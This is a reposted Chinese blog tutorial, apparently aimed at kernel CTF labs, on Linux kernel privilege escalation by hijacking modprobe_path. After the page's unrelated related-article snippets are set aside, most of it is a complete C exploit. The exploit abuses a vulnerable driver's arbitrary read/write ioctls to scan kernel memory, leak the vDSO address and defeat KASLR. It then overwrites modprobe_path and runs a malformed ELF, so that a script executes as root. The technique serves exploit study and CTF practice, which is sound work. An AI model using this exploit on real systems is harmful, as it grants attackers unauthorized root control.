linux 内核提权总结(demo+exp分析) -- 任意读写(四)

2024-09-08 10:38

本文主要是介绍linux 内核提权总结(demo+exp分析) -- 任意读写(四),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

hijack_modprobe_path篇

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

 

  • 原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermodehelper(char *modprobe_path ...)
  • 修改modprobe后,即可实现root权限任意命令执行

  • 攻击流程

    • (内核任意读写漏洞)内核修改全局变量 modprobe_path为目标指令
    • 写入错误格式elf文件,并手动执行,触发

一. 利用步骤

1. 定位modprobe_path(开启kaslr)

  • 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址

  • 获得当前调试阶段modprobe_path与内核基地址固定偏移

  • modprobe_path_addr = 内核基地址+固定偏移

2. 修改modprobe_path 为任意指令

 

二. 驱动代码

见cred篇:linux 内核提权总结(demo+exp分析) -- 任意读写(一)

 

 

三. exp

#define _GNU_SOURCE#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/auxv.h>
#include <sys/prctl.h>#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002size_t modprobe_path = 0xe3cba0;
size_t vmlinux_base = 0;struct vunl
{char *point;size_t size;
} VUNL;void leak_data(int fd, char *buf)
{char *res = NULL;VUNL.size = 0x1000;for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000){VUNL.point = (char *)addr;ioctl(fd, CHANGE_POINT, &VUNL); //change the pointioctl(fd, RW_READ, buf);if (!strcmp("gettimeofday", buf + 0x2b5)){printf("[+] the addr of VDSO is: 0x%lx\n", addr);vmlinux_base = addr & 0xffffffffff000000;printf("[+] the addr of vmlinux base is: 0x%lx\n", vmlinux_base);break;}puts("[-] not found, try again!\n");}return;
}int main(int argc, char *argv[])
{int fd = 0;char *buf = malloc(0x1000);fd = open("/dev/rw_any_dev", O_RDWR);leak_data(fd, buf);modprobe_path += vmlinux_base;printf("[+] the addr of modprobe_path is: 0x%lx\n", modprobe_path);VUNL.size = strlen(argv[1])+1;VUNL.point = (char *)modprobe_path;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_WRITE, argv[1]);system("echo -ne '#!/bin/sh\nchmod 777 /flag' > /su.sh");system("chmod +x /su.sh");system("echo -ne '\\xff\\xff\\xff\\xff' > /dummy");system("chmod +x /dummy");system("/dummy");return 0;
}

 

这篇关于linux 内核提权总结(demo+exp分析) -- 任意读写(四)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1147882

相关文章

HarmonyOS学习(七)——UI(五)常用布局总结

自适应布局 1.1、线性布局(LinearLayout) 通过线性容器Row和Column实现线性布局。Column容器内的子组件按照垂直方向排列,Row组件中的子组件按照水平方向排列。 属性说明space通过space参数设置主轴上子组件的间距,达到各子组件在排列上的等间距效果alignItems设置子组件在交叉轴上的对齐方式,且在各类尺寸屏幕上表现一致,其中交叉轴为垂直时,取值为Vert

10. 文件的读写

10.1 文本文件 操作文件三大类: ofstream:写操作ifstream:读操作fstream:读写操作 打开方式解释ios::in为了读文件而打开文件ios::out为了写文件而打开文件,如果当前文件存在则清空当前文件在写入ios::app追加方式写文件ios::trunc如果文件存在先删除,在创建ios::ate打开文件之后令读写位置移至文件尾端ios::binary二进制方式

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

学习hash总结

2014/1/29/   最近刚开始学hash,名字很陌生,但是hash的思想却很熟悉,以前早就做过此类的题,但是不知道这就是hash思想而已,说白了hash就是一个映射,往往灵活利用数组的下标来实现算法,hash的作用:1、判重;2、统计次数;

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

Android实现任意版本设置默认的锁屏壁纸和桌面壁纸(两张壁纸可不一致)

客户有些需求需要设置默认壁纸和锁屏壁纸  在默认情况下 这两个壁纸是相同的  如果需要默认的锁屏壁纸和桌面壁纸不一样 需要额外修改 Android13实现 替换默认桌面壁纸: 将图片文件替换frameworks/base/core/res/res/drawable-nodpi/default_wallpaper.*  (注意不能是bmp格式) 替换默认锁屏壁纸: 将图片资源放入vendo

内核启动时减少log的方式

内核引导选项 内核引导选项大体上可以分为两类:一类与设备无关、另一类与设备有关。与设备有关的引导选项多如牛毛,需要你自己阅读内核中的相应驱动程序源码以获取其能够接受的引导选项。比如,如果你想知道可以向 AHA1542 SCSI 驱动程序传递哪些引导选项,那么就查看 drivers/scsi/aha1542.c 文件,一般在前面 100 行注释里就可以找到所接受的引导选项说明。大多数选项是通过"_